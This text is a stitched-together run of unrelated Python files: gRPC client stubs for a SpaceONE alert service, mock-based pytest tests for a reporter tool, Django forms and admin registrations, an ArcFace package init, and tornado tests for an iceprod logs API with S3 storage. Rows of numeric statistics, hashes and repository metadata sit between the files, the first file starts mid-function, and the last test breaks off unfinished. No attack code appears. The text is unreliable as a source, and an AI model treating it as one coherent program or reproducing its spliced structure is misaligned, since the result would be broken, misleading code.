            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/update_state',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.UpdateAlertStateRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def merge(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/merge',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.MergeAlertRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def snooze(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/snooze',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.SnoozeAlertRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def add_responder(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/add_responder',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def remove_responder(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/remove_responder',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertResponderRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def add_project_dependency(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/add_project_dependency',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def remove_project_dependency(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/remove_project_dependency',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertProjectDependencyRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def delete(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # delete returns google.protobuf.Empty rather than AlertInfo.
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/delete',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertRequest.SerializeToString,
            google_dot_protobuf_dot_empty__pb2.Empty.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def get(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/get',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.GetAlertRequest.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def list(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/list',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertQuery.SerializeToString,
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertsInfo.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def stat(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        # stat returns a free-form google.protobuf.Struct.
        return grpc.experimental.unary_unary(request, target, '/spaceone.api.monitoring.v1.Alert/stat',
            spaceone_dot_api_dot_monitoring_dot_v1_dot_alert__pb2.AlertStatQuery.SerializeToString,
            google_dot_protobuf_dot_struct__pb2.Struct.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 51.617204 | 137 | 0.694234 | 2,486 | 24,002 | 6.256637 | 0.048673 | 0.038061 | 0.065707 | 0.079787 | 0.949788 | 0.947988 | 0.939308 | 0.91102 | 0.864408 | 0.835348 | 0 | 0.010109 | 0.237564 | 24,002 | 464 | 138 | 51.728448 | 0.839836 | 0.047579 | 0 | 0.618812 | 1 | 0 | 0.083454 | 0.053599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069307 | false | 0 | 0.009901 | 0.032178 | 0.118812 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
af08353f80f8ea7a9c743ec331779c9c3d84f0da | 1,474 | py | Python | tests/test_reports.py | agrc/reporter | 277f14a477b9c68cec090a8a7f7f522c1dd719f0 | [
"MIT"
] | null | null | null | tests/test_reports.py | agrc/reporter | 277f14a477b9c68cec090a8a7f7f522c1dd719f0 | [
"MIT"
] | 8 | 2020-09-28T16:45:45.000Z | 2020-10-22T14:53:17.000Z | tests/test_reports.py | agrc/reporter | 277f14a477b9c68cec090a8a7f7f522c1dd719f0 | [
"MIT"
] | null | null | null | from reporter import reports
# def test_AGOL_create_report_itemid_not_in_metatable()
def test_AGOL_create_report_call_with_metatable_info(mocker):
    """create_report passes the metatable row's category to get_item_info.

    The item's id ('foo') IS present in the metatable, so its category
    ('Test Category') should flow through to the get_item_info call.
    """
    mock_object = mocker.Mock()
    mock_org = mocker.patch('reporter.tools.Organization')
    item = mocker.Mock()
    item.itemid = 'foo'
    mock_org.get_feature_services_in_folders.return_value = [(item, 'folder1')]
    mock_org.get_open_data_groups.return_value = ['Open Data Group']
    mock_metatable = mocker.patch('reporter.tools.Metatable')
    mock_row = mocker.Mock()
    mock_row.category = 'Test Category'
    mock_metatable.metatable_dict = {'foo': mock_row}

    reports.AGOLUsageReport.create_report(mock_object)

    # BUG FIX: the original `assert mock.called_with(...)` is vacuous --
    # Mock auto-creates a `called_with` child mock whose return value is
    # always truthy, so the assertion could never fail.  Use the real
    # `assert_called_with` API so the call is actually verified.
    # NOTE(review): if this now fails, the production code may call through
    # mock_org.return_value (the patched class's instance) -- confirm.
    mock_org.get_item_info.assert_called_with(item, ['Open Data Group'], 'folder1', 'Test Category')
def test_AGOL_create_report_call_without_metatable_info(mocker):
    """create_report passes None as the category when the item is not in the metatable.

    The metatable only knows about 'bar', so the 'foo' item should be looked
    up with no category.
    """
    mock_object = mocker.Mock()
    mock_org = mocker.patch('reporter.tools.Organization')
    item = mocker.Mock()
    item.itemid = 'foo'
    mock_org.get_feature_services_in_folders.return_value = [(item, 'folder1')]
    mock_org.get_open_data_groups.return_value = ['Open Data Group']
    mock_metatable = mocker.patch('reporter.tools.Metatable')
    mock_row = mocker.Mock()
    mock_row.category = 'Test Category'
    mock_metatable.metatable_dict = {'bar': mock_row}

    reports.AGOLUsageReport.create_report(mock_object)

    # BUG FIX: the original `assert mock.called_with(...)` is vacuous --
    # Mock auto-creates a `called_with` child mock whose return value is
    # always truthy, so the assertion could never fail.  Use the real
    # `assert_called_with` API so the call is actually verified.
    # NOTE(review): if this now fails, the production code may call through
    # mock_org.return_value (the patched class's instance) -- confirm.
    mock_org.get_item_info.assert_called_with(item, ['Open Data Group'], 'folder1', None)
| 35.095238 | 100 | 0.747626 | 198 | 1,474 | 5.207071 | 0.227273 | 0.077595 | 0.058196 | 0.093113 | 0.924345 | 0.902037 | 0.849661 | 0.849661 | 0.849661 | 0.849661 | 0 | 0.003157 | 0.140434 | 1,474 | 41 | 101 | 35.95122 | 0.810576 | 0.035957 | 0 | 0.740741 | 0 | 0 | 0.169838 | 0.071882 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.074074 | false | 0 | 0.037037 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bbc6b7b7d84b1980948206284afc362ede5ed460 | 137 | py | Python | calendars/admin.py | orlowdev/aite | 6fcb02211d9fcb6be84de99deebc2aabe8075f61 | [
"Apache-2.0"
] | 1 | 2021-04-13T15:44:05.000Z | 2021-04-13T15:44:05.000Z | calendars/admin.py | orlowdev/aite | 6fcb02211d9fcb6be84de99deebc2aabe8075f61 | [
"Apache-2.0"
] | null | null | null | calendars/admin.py | orlowdev/aite | 6fcb02211d9fcb6be84de99deebc2aabe8075f61 | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from calendars.models import Event, Calendar
# Expose the calendar models in the Django admin, Calendar first.
for calendar_model in (Calendar, Event):
    admin.site.register(calendar_model)
| 19.571429 | 44 | 0.824818 | 19 | 137 | 5.947368 | 0.578947 | 0.230089 | 0.300885 | 0.442478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094891 | 137 | 6 | 45 | 22.833333 | 0.91129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
3c2de69087b34c4d34e9fbff445a75fde933f2ce | 915 | py | Python | events/forms.py | maxweis/Web-App | f2df73bbc6da88d2d42713de9b72b0d1a799db6e | [
"Apache-2.0"
] | 2 | 2019-03-26T17:43:16.000Z | 2019-04-01T01:18:16.000Z | events/forms.py | maxweis/Web-App | f2df73bbc6da88d2d42713de9b72b0d1a799db6e | [
"Apache-2.0"
] | 1 | 2019-03-29T11:33:56.000Z | 2019-03-29T11:33:56.000Z | events/forms.py | maxweis/Resumania | f2df73bbc6da88d2d42713de9b72b0d1a799db6e | [
"Apache-2.0"
] | null | null | null | from django import forms
from django.forms import ModelForm
from bootstrap_datepicker_plus import DateTimePickerInput
from .models import Event
class EventCreationForm(ModelForm):
    """Model form for creating an Event.

    ``rso`` is excluded from the form -- presumably it is assigned by the
    view rather than entered by the user (TODO confirm against the view).
    """
    name = forms.CharField(max_length=64)
    time_begin = forms.DateTimeField(widget=DateTimePickerInput)
    time_end = forms.DateTimeField(widget=DateTimePickerInput)
    place = forms.CharField(max_length=64)

    class Meta:
        # BUG FIX: Meta must be a plain options holder; the original
        # inherited from ModelForm, which pollutes the options class with
        # unrelated form machinery.
        model = Event
        fields = ('name', 'time_begin', 'time_end', 'place')
        exclude = ['rso']
class EditEventForm(ModelForm):
    """Model form for editing an existing Event.

    Mirrors EventCreationForm field-for-field; ``rso`` is excluded --
    presumably assigned by the view, not the user (TODO confirm).
    """
    name = forms.CharField(max_length=64)
    time_begin = forms.DateTimeField(widget=DateTimePickerInput)
    time_end = forms.DateTimeField(widget=DateTimePickerInput)
    place = forms.CharField(max_length=64)

    class Meta:
        # BUG FIX: Meta must be a plain options holder; the original
        # inherited from ModelForm, which pollutes the options class with
        # unrelated form machinery.
        model = Event
        fields = ('name', 'time_begin', 'time_end', 'place')
        exclude = ['rso']
3c447d1247890a297054bf59d4a2cd8161bd9bd4 | 115 | py | Python | notebooks/modules/arcface/__init__.py | AgRenaud/Vector-Based-Image-Recognition-API | dba53672e018bee5d1ec506e74ed64cd310afdc4 | [
"Apache-2.0"
] | 3 | 2021-11-21T21:50:09.000Z | 2021-11-24T07:35:07.000Z | notebooks/modules/arcface/__init__.py | AgRenaud/optical-character-recognition | dba53672e018bee5d1ec506e74ed64cd310afdc4 | [
"Apache-2.0"
] | 1 | 2021-11-24T11:35:49.000Z | 2021-11-24T12:13:08.000Z | notebooks/modules/arcface/__init__.py | AgRenaud/optical-character-recognition | dba53672e018bee5d1ec506e74ed64cd310afdc4 | [
"Apache-2.0"
] | null | null | null | from modules.arcface.ArcFaceBlock import ArcFaceBlock
from modules.arcface.loss import arcface_loss as ArcFaceLoss
| 38.333333 | 60 | 0.878261 | 15 | 115 | 6.666667 | 0.533333 | 0.22 | 0.36 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 115 | 2 | 61 | 57.5 | 0.952381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3c8987d2dab4bf35dd695a6d297e78fa57cc0342 | 189 | py | Python | sales/admin.py | GeekGuste/ecommerce-nuxtjs-djoser | 3ee49307eee0e8829504d6dc485fc163e94f18be | [
"MIT"
] | null | null | null | sales/admin.py | GeekGuste/ecommerce-nuxtjs-djoser | 3ee49307eee0e8829504d6dc485fc163e94f18be | [
"MIT"
] | null | null | null | sales/admin.py | GeekGuste/ecommerce-nuxtjs-djoser | 3ee49307eee0e8829504d6dc485fc163e94f18be | [
"MIT"
] | null | null | null | from django.contrib import admin
# Consolidated the two duplicate `from sales.models import ...` statements
# into a single import.
from sales.models import Category, Product

# Register the sales models so they can be managed from the Django admin.
admin.site.register(Category)
admin.site.register(Product)
| 23.625 | 33 | 0.825397 | 27 | 189 | 5.777778 | 0.481481 | 0.115385 | 0.192308 | 0.269231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10582 | 189 | 7 | 34 | 27 | 0.923077 | 0.137566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3c9731bfdb35e8180b54ebf66e3d195c221ec86f | 16,386 | py | Python | tests/server/rest/logs_test.py | WIPACrepo/iceprod | 83615da9b0e764bc2498ac588cc2e2b3f5277235 | [
"MIT"
] | 2 | 2017-01-23T17:12:41.000Z | 2019-01-14T13:38:17.000Z | tests/server/rest/logs_test.py | WIPACrepo/iceprod | 83615da9b0e764bc2498ac588cc2e2b3f5277235 | [
"MIT"
] | 242 | 2016-05-09T18:46:51.000Z | 2022-03-31T22:02:29.000Z | tests/server/rest/logs_test.py | WIPACrepo/iceprod | 83615da9b0e764bc2498ac588cc2e2b3f5277235 | [
"MIT"
] | 2 | 2017-03-27T09:13:40.000Z | 2019-01-27T10:55:30.000Z | """
Test script for REST/logs
"""
import logging
logger = logging.getLogger('rest_logs_test')
import os
import sys
import time
import random
import shutil
import tempfile
import unittest
import subprocess
import json
from functools import partial
from unittest.mock import patch, MagicMock
import string
from tests.util import unittest_reporter, glob_tests
import tornado.web
import tornado.ioloop
from tornado.httputil import url_concat
from tornado.httpclient import AsyncHTTPClient, HTTPError
from tornado.testing import AsyncTestCase
import boto3
from moto import mock_s3
from rest_tools.server import Auth, RestServer
from iceprod.server.modules.rest_api import setup_rest
import iceprod.server.rest.logs
from . import RestTestCase
def fake_data(N):
    """Return a random string of *N* printable characters."""
    chars = random.choices(string.printable, k=N)
    return ''.join(chars)
class rest_logs_test(RestTestCase):
def setUp(self):
config = {'rest':{'logs':{}}}
super(rest_logs_test,self).setUp(config=config)
@unittest_reporter(name='REST POST /logs')
def test_100_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
    @unittest_reporter(name='REST GET /logs')
    def test_105_logs(self):
        """GET /logs lists stored entries and supports name/keys filters."""
        client = AsyncHTTPClient()

        # Store one named log entry to list back.
        data = {'name': 'stdlog', 'data': 'foo bar baz'}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']

        # Unfiltered listing: exactly the one entry, with all its fields.
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='GET',
                headers={'Authorization': 'bearer '+self.token})
        ret = json.loads(r.body)
        self.assertIn(log_id, ret)
        self.assertEqual(len(ret), 1)
        for k in data:
            self.assertIn(k, ret[log_id])
            self.assertEqual(data[k], ret[log_id][k])

        # Filtered listing: match by name and restrict the returned keys
        # ('|'-separated list); the entry should still be found.
        args = {'name': 'stdlog', 'keys': 'log_id|name|data'}
        r = yield client.fetch(url_concat('http://localhost:%d/logs'%self.port, args),
                method='GET',
                headers={'Authorization': 'bearer '+self.token})
        ret = json.loads(r.body)
        self.assertIn(log_id, ret)
@unittest_reporter(name='REST GET /logs/<log_id>')
def test_110_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
r = yield client.fetch('http://localhost:%d/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
@unittest_reporter(name='REST POST /datasets/<dataset_id>/logs')
def test_120_logs(self):
client = AsyncHTTPClient()
data = {'data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/datasets/12345/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
@unittest_reporter(name='REST GET /datasets/<dataset_id>/logs/<log_id>')
def test_130_logs(self):
client = AsyncHTTPClient()
data = {'dataset_id':'12345','data':'foo bar baz'}
r = yield client.fetch('http://localhost:%d/logs'%self.port,
method='POST', body=json.dumps(data),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 201)
ret = json.loads(r.body)
log_id = ret['result']
r = yield client.fetch('http://localhost:%d/datasets/12345/logs/%s'%(self.port,log_id),
headers={'Authorization': 'bearer '+self.token})
self.assertEqual(r.code, 200)
ret = json.loads(r.body)
self.assertEqual(data['data'], ret['data'])
@unittest_reporter(name='REST GET /datasets/<dataset_id>/tasks/<task_id>/logs')
def test_140_logs(self):
    # Exercise the task-scoped log listing, including the 'group', 'order',
    # 'num', and 'keys' query parameters.
    client = AsyncHTTPClient()
    data = {'data':'foo', 'dataset_id': 'foo', 'task_id': 'bar', 'name': 'stdout'}
    r = yield client.fetch('http://localhost:%d/logs'%self.port,
            method='POST', body=json.dumps(data),
            headers={'Authorization': 'bearer '+self.token})
    self.assertEqual(r.code, 201)
    ret = json.loads(r.body)
    log_id = ret['result']
    # plain listing: exactly the one log just created
    r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs'%(self.port,),
            headers={'Authorization': 'bearer '+self.token})
    self.assertEqual(r.code, 200)
    ret = json.loads(r.body)
    self.assertIn('logs', ret)
    self.assertEqual(len(ret['logs']), 1)
    self.assertEqual(ret['logs'][0]['log_id'], log_id)
    self.assertEqual(data['data'], ret['logs'][0]['data'])
    # now try for groupings
    data = {'data':'bar', 'dataset_id': 'foo', 'task_id': 'bar', 'name': 'stderr'}
    r = yield client.fetch('http://localhost:%d/logs'%self.port,
            method='POST', body=json.dumps(data),
            headers={'Authorization': 'bearer '+self.token})
    self.assertEqual(r.code, 201)
    data = {'data':'baz', 'dataset_id': 'foo', 'task_id': 'bar', 'name': 'stdout'}
    r = yield client.fetch('http://localhost:%d/logs'%self.port,
            method='POST', body=json.dumps(data),
            headers={'Authorization': 'bearer '+self.token})
    self.assertEqual(r.code, 201)
    # group=true: one entry per log name, each holding the latest payload
    # ('baz' superseded 'foo' for stdout; 'bar' remains for stderr)
    r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs?group=true'%(self.port,),
            headers={'Authorization': 'bearer '+self.token})
    self.assertEqual(r.code, 200)
    ret = json.loads(r.body)
    self.assertIn('logs', ret)
    logging.debug('logs: %r', ret['logs'])
    self.assertEqual(len(ret['logs']), 2)
    self.assertEqual('baz', ret['logs'][0]['data'])
    self.assertEqual('bar', ret['logs'][1]['data'])
    # now check order, num, and keys
    # ascending order + num=1 returns only the oldest log ('foo'),
    # projected down to just the requested keys
    r = yield client.fetch('http://localhost:%d/datasets/foo/tasks/bar/logs?order=asc&num=1&keys=log_id|data'%(self.port,),
            headers={'Authorization': 'bearer '+self.token})
    self.assertEqual(r.code, 200)
    ret = json.loads(r.body)
    self.assertIn('logs', ret)
    logging.debug('logs: %r', ret['logs'])
    self.assertEqual(len(ret['logs']), 1)
    self.assertEqual(ret['logs'][0]['log_id'], log_id)
    self.assertEqual('foo', ret['logs'][0]['data'])
    self.assertCountEqual(['log_id','data'], list(ret['logs'][0].keys()))
class rest_logs_test2(RestTestCase):
    """Tests for the logs REST API with S3 storage configured.

    Every test runs under moto's @mock_s3, so no real AWS calls are made.
    The assertions show that large payloads (fake_data(2000000)) end up as
    objects in the 'iceprod2-logs' bucket while smaller ones
    (fake_data(200000)) do not — presumably the API stores small logs
    inline and offloads large ones to S3; TODO confirm the exact size
    threshold against the server implementation.
    """
    def setUp(self):
        # Enable the logs REST service with placeholder S3 credentials
        # (moto intercepts the S3 traffic, so the values are irrelevant).
        config = {
            'rest':{
                'logs':{},
            },
            's3': {
                'access_key': 'XXX',
                'secret_key': 'XXX',
            },
        }
        super(rest_logs_test2,self).setUp(config=config)

    @mock_s3
    @unittest_reporter(name='REST POST /logs - S3')
    def test_200_logs(self):
        conn = boto3.resource('s3', region_name='us-east-1')
        conn.create_bucket(Bucket='iceprod2-logs')
        client = AsyncHTTPClient()
        # large payload: must be written through to S3, keyed by log_id
        data = {'data':fake_data(2000000)}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
        self.assertEqual(body, data['data'])
        # small payload: must NOT create an S3 object (get() raises)
        data = {'data':fake_data(200000)}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        with self.assertRaises(Exception):
            conn.Object('iceprod2-logs', log_id).get()

    @mock_s3
    @unittest_reporter(name='REST GET /logs/<log_id> - S3')
    def test_210_logs(self):
        conn = boto3.resource('s3', region_name='us-east-1')
        conn.create_bucket(Bucket='iceprod2-logs')
        client = AsyncHTTPClient()
        # large payload: stored in S3, but GET must still return the full data
        data = {'data':fake_data(2000000)}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
        self.assertEqual(body, data['data'])
        r = yield client.fetch('http://localhost:%d/logs/%s'%(self.port,log_id),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 200)
        ret = json.loads(r.body)
        self.assertEqual(data['data'], ret['data'])
        # small payload: not in S3, GET must return it from primary storage
        data = {'data':fake_data(200000)}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        with self.assertRaises(Exception):
            conn.Object('iceprod2-logs', log_id).get()
        r = yield client.fetch('http://localhost:%d/logs/%s'%(self.port,log_id),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 200)
        ret = json.loads(r.body)
        self.assertEqual(data['data'], ret['data'])

    @mock_s3
    @unittest_reporter(name='REST POST /datasets/<dataset_id>/logs - S3')
    def test_220_logs(self):
        conn = boto3.resource('s3', region_name='us-east-1')
        conn.create_bucket(Bucket='iceprod2-logs')
        client = AsyncHTTPClient()
        # dataset-scoped POST behaves like POST /logs: large payload goes to S3
        data = {'data':fake_data(2000000)}
        r = yield client.fetch('http://localhost:%d/datasets/12345/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
        self.assertEqual(body, data['data'])
        # small payload: no S3 object created
        data = {'data':fake_data(200000)}
        r = yield client.fetch('http://localhost:%d/datasets/12345/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        with self.assertRaises(Exception):
            conn.Object('iceprod2-logs', log_id).get()

    @mock_s3
    @unittest_reporter(name='REST GET /datasets/<dataset_id>/logs/<log_id> - S3')
    def test_230_logs(self):
        conn = boto3.resource('s3', region_name='us-east-1')
        conn.create_bucket(Bucket='iceprod2-logs')
        client = AsyncHTTPClient()
        # large payload stored in S3, retrievable via the dataset-scoped GET
        data = {'dataset_id':'12345','data':fake_data(2000000)}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        body = conn.Object('iceprod2-logs', log_id).get()['Body'].read().decode('utf-8')
        self.assertEqual(body, data['data'])
        r = yield client.fetch('http://localhost:%d/datasets/12345/logs/%s'%(self.port,log_id),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 200)
        ret = json.loads(r.body)
        self.assertEqual(data['data'], ret['data'])
        # small payload: not in S3, still retrievable via the scoped GET
        data = {'dataset_id':'12345','data':fake_data(200000)}
        r = yield client.fetch('http://localhost:%d/logs'%self.port,
                method='POST', body=json.dumps(data),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 201)
        ret = json.loads(r.body)
        log_id = ret['result']
        with self.assertRaises(Exception):
            conn.Object('iceprod2-logs', log_id).get()
        r = yield client.fetch('http://localhost:%d/datasets/12345/logs/%s'%(self.port,log_id),
                headers={'Authorization': 'bearer '+self.token})
        self.assertEqual(r.code, 200)
        ret = json.loads(r.body)
        self.assertEqual(data['data'], ret['data'])

    @mock_s3
    @unittest_reporter(name='REST GET /datasets/<dataset_id>/tasks/<task_id>/logs - S3')
    def test_240_logs(self):
        conn = boto3.resource('s3', region_name='us-east-1')
        conn.create_bucket(Bucket='iceprod2-logs')
